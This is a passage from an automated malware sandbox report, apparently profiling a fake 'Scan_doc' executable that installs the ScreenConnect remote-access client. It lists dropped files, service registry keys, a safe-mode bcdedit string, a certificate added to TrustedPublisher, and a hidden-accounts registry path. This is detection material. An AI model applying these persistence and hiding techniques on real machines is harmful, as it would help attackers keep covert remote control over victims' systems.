                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD9B8A4162 push eax; ret 9_2_00007FFD9B8A4163
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD9B8A30BA push eax; iretd 9_2_00007FFD9B8A30BB
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD9B8A401A push eax; iretd 9_2_00007FFD9B8A401B
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD9B8A3F3A pushad ; retf 9_2_00007FFD9B8A3F3B
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD9B8A2E18 push eax; ret 9_2_00007FFD9B8A2E7B
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeCode function: 10_2_018318B1 push 4C056A33h; retf 10_2_018318BD
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeCode function: 11_2_05959790 pushfd ; retf 11_2_05959791
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FFD9B870028 push eax; retf 12_2_00007FFD9B870029
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FFD9BB87BE6 push ss; ret 12_2_00007FFD9BB87BE7
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FFD9BB85370 push eax; ret 12_2_00007FFD9BB853E9
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FFD9BB85342 push eax; ret 12_2_00007FFD9BB853E9
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FFD9BB81281 push ebx; iretd 12_2_00007FFD9BB81282
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FFD9BB8116D push esp; iretd 12_2_00007FFD9BB8116E
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FFD9BB8799B push ss; iretd 12_2_00007FFD9BB87A5E
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FFD9BBB7B6D push ecx; ret 13_2_00007FFD9BBB7B7A
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FFD9BBB7B0D push ecx; ret 13_2_00007FFD9BBB7B2A
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FFD9BBBB9C4 pushfd ; ret 13_2_00007FFD9BBBB9EA
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FFD9BBBB636 pushfd ; ret 13_2_00007FFD9BBBB67A
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FFD9BBB7E59 push esp; ret 13_2_00007FFD9BBB7E7A
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FFD9BBB7DAC push ebx; ret 13_2_00007FFD9BBB7DCA
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeCode function: 13_2_00007FFD9BBB7CDC push edx; ret 13_2_00007FFD9BBB7CFA

                  Persistence and Installation Behavior

                  barindex
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.Core.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.WindowsFileManager.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.Windows.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.ClientService.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.Client.dllJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.WindowsClient.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exeJump to dropped file
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                  Source: ScreenConnect.ClientService.dll.1.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: ScreenConnect.ClientService.dll0.1.drBinary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Application
                  Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ScreenConnect Client (e76a7089-9bd3-460c-8e9c-7b01b18dcd91)

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000002.1966891109.000000001B352000.00000002.00000001.01000000.0000000F.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.ClientService.exe, 0000000A.00000002.1963256182.0000000003322000.00000002.00000001.01000000.0000000D.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 0000000C.00000002.2960868072.0000000003321000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 0000000D.00000002.2020769153.0000000002E21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.WindowsClient.exe, 0000000D.00000002.2020718098.0000000002DF0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.ClientService.dll.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.Windows.dll0.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: ScreenConnect.ClientService.dll0.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList?ScreenConnect.WindowsClient.exe
                  Source: ScreenConnect.Windows.dll.1.drString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C BlobJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
